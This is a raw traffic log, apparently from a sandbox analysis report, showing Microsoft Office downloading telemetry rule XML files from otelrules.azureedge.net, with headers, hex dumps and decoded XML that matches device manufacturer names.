                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            68192.168.2.44983413.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:07 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:08 UTC491INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:07 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 499
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                            ETag: "0x8DC582B98CEC9F6"
                                                                            x-ms-request-id: 54a08b66-801e-008f-529b-272c5d000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083707Z-16849878b78bjkl8dpep89pbgg00000003kg000000001em1
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache-Info: L1_T2
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:08 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            69192.168.2.44984313.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:08 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:08 UTC491INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:08 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 423
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                            ETag: "0x8DC582BB7564CE8"
                                                                            x-ms-request-id: 5e4053db-f01e-0052-6472-279224000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083708Z-15b8d89586fvpb597drk06r8fc00000005y0000000000s1c
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache-Info: L1_T2
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:08 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            70192.168.2.44984213.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:08 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:08 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:08 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 486
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                            ETag: "0x8DC582B92FCB436"
                                                                            x-ms-request-id: 01fc617d-601e-000d-05a4-262618000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083708Z-16849878b78wc6ln1zsrz6q9w800000004eg000000006xf1
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:08 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            71192.168.2.44983913.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:08 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:08 UTC491INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:08 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 472
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                            ETag: "0x8DC582B9D43097E"
                                                                            x-ms-request-id: d63b5638-a01e-0021-2ab4-27814c000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083708Z-16849878b785jrf8dn0d2rczaw00000005v000000000fc55
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            X-Cache-Info: L1_T2
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:08 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            72192.168.2.44984013.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:08 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:08 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:08 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 420
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                            ETag: "0x8DC582B9DAE3EC0"
                                                                            x-ms-request-id: 892d3b27-201e-005d-7649-27afb3000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083708Z-16849878b78q9m8bqvwuva4svc00000003d000000000178n
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:08 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            73192.168.2.44984113.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:08 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:08 UTC491INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:08 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 427
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                            ETag: "0x8DC582BA909FA21"
                                                                            x-ms-request-id: afaa9bab-501e-0078-092c-2806cf000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083708Z-r197bdfb6b4bs5qf58wn14wgm000000003u0000000001885
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            X-Cache-Info: L1_T2
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:08 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            74192.168.2.44985013.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:09 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:09 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:09 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 400
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                                                            ETag: "0x8DC582BB2D62837"
                                                                            x-ms-request-id: 0a130610-701e-001e-4a1f-26f5e6000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083709Z-17c5cb586f6sqz6fff89etrx0800000004gg000000000vyv
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:09 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            75192.168.2.44984913.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:09 UTC192OUTGET /rules/rule120641v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:09 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:09 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 404
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:39 GMT
                                                                            ETag: "0x8DC582B95C61A3C"
                                                                            x-ms-request-id: 7dd8eec7-801e-00ac-442c-27fd65000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083709Z-17c5cb586f6sqz6fff89etrx0800000004g0000000001qz9
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:09 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            76192.168.2.44984713.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:09 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:09 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:09 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 468
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                                                                            ETag: "0x8DC582BB046B576"
                                                                            x-ms-request-id: 43d69f68-001e-00ad-61b4-24554b000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083709Z-15b8d89586flzzks5bs37v2b9000000008xg00000000988k
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:09 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            77192.168.2.44984613.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:09 UTC192OUTGET /rules/rule120640v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:09 UTC470INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:09 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 478
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:48 GMT
                                                                            ETag: "0x8DC582B9B233827"
                                                                            x-ms-request-id: 11ec9ee4-a01e-0053-158c-268603000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083709Z-r197bdfb6b46krmwag4tzr9x7c00000004e000000000avzm
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
                                                                            2024-10-28 08:37:09 UTC478INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120640" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            78192.168.2.44984813.107.246.45443
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-10-28 08:37:09 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                                                                            Connection: Keep-Alive
                                                                            Accept-Encoding: gzip
                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                            Host: otelrules.azureedge.net
                                                                            2024-10-28 08:37:09 UTC491INHTTP/1.1 200 OK
                                                                            Date: Mon, 28 Oct 2024 08:37:09 GMT
                                                                            Content-Type: text/xml
                                                                            Content-Length: 479
                                                                            Connection: close
                                                                            Cache-Control: public, max-age=604800, immutable
                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                            ETag: "0x8DC582BB7D702D0"
                                                                            x-ms-request-id: 395fbb66-201e-003f-4179-266d94000000
                                                                            x-ms-version: 2018-03-28
                                                                            x-azure-ref: 20241028T083709Z-16849878b787wpl5wqkt5731b400000005ng000000000qyd
                                                                            x-fd-int-roxy-purgeid: 0
                                                                            X-Cache-Info: L1_T2
                                                                            X-Cache: TCP_HIT
                                                                            Accept-Ranges: bytes
